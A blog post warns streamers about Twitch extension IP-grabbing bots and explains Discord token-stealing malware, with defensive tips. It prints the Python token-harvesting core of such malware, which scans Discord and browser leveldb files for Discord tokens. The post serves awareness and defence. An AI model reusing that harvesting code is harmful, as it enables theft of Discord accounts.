Twitch and IP grabbing bots: Annoying pests and how to fight them

This is an old tweet of mine, but I thought I would revive it for the blog.

What is going on?

Recently, many streamers have most likely seen an uptick in follows from random accounts that are running an exploit in how Twitch extensions work. Specifically extensions that use IP grabbing functions in order to enhance your stream or your channel description (Stream Schedule & Countdown, Viewer Geolocation, Suggestion Box v2, Score Overlay, etc.) These extensions call for data from their servers, which could be logging each communication attempt. (Basically, when you open a channel your browser loads images or web panels from external servers and those servers may log info about the connection and by extension, you) Even if the connection itself is trusted, many of these extensions have XSS (cross site scripting) vulnerabilities that can still be exploited by a malicious actor by allowing external API or images.

What information is being leaked?

Typically it would leak info about IP, country, ISP, browser version, device type, and Operating System. However, it could also potentially collect information such as battery level, whenever it’s charging or not, device orientation, screen size, preferred language.

Why do these people want this information?

There’s a number of reasons that someone would attempt to collect this information. They could be using your IP address to DDoS you. This is most likely something that would be targeted at larger streamers. They could also be collecting this information into a registry to match twitch users to IP addresses (this could link different Twitch accounts together, show a streamer’s approximate location, etc.)

Should you be concerned?

Yes, but also No. While privacy is important, the data collected is just publicly visible by any website you are visiting. So it’s always better not to directly expose this information to the world. Just like your physical home address, that not secret information, but it would be in your best interest not to give it to everyone. This data usually can't lead straight to your doors, but can be useful in case of location estimation or tracking you over the internet cough advertisements cough (If you are paying your ISP for a public IP address, this should be more concerning to you because most ISP are providing your registration details/contact to public database (WHOIS).

What can Twitch do about it?

Besides banning accounts using such exploits (something which may be difficult to identify), there is not much that Twitch can do. They could ban extensions that can use external images or API, but this would make a lot of extensions limited. Twitch could prohibit images hosted from unpopular URLs (allowing only sites like Imgur), disallowing external API usage would break many extensions, and would do nothing to make them fixable, resulting in a slew of abandoned Twitch extensions.

What can you do about it?

There are a few ways you can protect your privacy online. First, you should always use a VPN and/or privacy oriented browser modes. If you really want to take it to the extreme, you can use Tor browser. Additionally, don’t click on these channels; it’s not worth it, there’s nothing there. If you have uBlock Origin, you can add "ext-twitch.tv" to your list of filters; take note that you won't be able to view/interact with any Twitch related extensions, but this should prevent all extensions (including all malicious extensions) from being able to load. Finally, if you do click one of these channels, you can change your MAC address manually in your router settings then reboot the modem & router to quickly get a new IP (or assign yourself a new static IP if you know how to do this).

Be safe, friends.

Malicious Packages on Discord (Stealing Discord Tokens)

There has recently been a surge of Discord token-grabbing malware used to compromise accounts. The continued propagation of the malware is driven by the public's susceptibility to the scam. I would like to explain how it works so that fewer individuals may fall for this in the future.

1) Why steal Discord tokens?

There is a large market for premium accounts, and accounts that contain rare badges. Attackers will often target Discord accounts that have purchased Nitro in order to attempt to resell them on an online marketplace such as epicnpc.com or playerup.com

2) How does it work?

The payload is executed as a token-grabber that reads a file location on your computer. These programs are often not caught by antivirus because they do not register themself to be run, don't copy themselves, and do not modify any files. In addition to this, they are often obfuscated by other code such as a simple video game or large amounts of unrelated code.

3) What does the code look like?

The code is pretty straightforward, it looks in a User's AppData folder for tokens stored in common browsers and Discord client's levelDB.

def find_tokens(path): path += '\\Local Storage\\leveldb' tokens = [] for file_name in os.listdir(path): if not file_name.endswith('.log') and not file_name.endswith('.ldb'): continue for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'): for token in re.findall(regex, line): tokens.append(token) return tokens def main(): local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA') paths = { 'Discord': roaming + '\\Discord', 'Discord Canary': roaming + '\\discordcanary', 'Discord PTB': roaming + '\\discordptb', 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' }

A famous version of this code, PirateStealer, steals private data such as login information and credit card info from the discord client.

4) What happens when my account is compromised?

When your account is compromised, the bot will most likely send a message to other individuals in your friend's list that have badges identifying them as valuable targets and attempt to get them to run the same payload that you did by masquerading as a trusted source. After this, your account will be locked down and the attacker will post your discord for sale on one of these sites for a going rate of anywhere from a few hundred dollars do a couple thousand dollars.

5) How to avoid this:

Do not download random files from friends out of the blue. If your friend is asking you to download something, confirm their identity by asking a question only they would know, asking them to contact you through a different means to confirm (voice call, Twitter, etc.) or declining the request entirely. People are always the weakest link in cybersecurity and education is the best method to secure ourselves.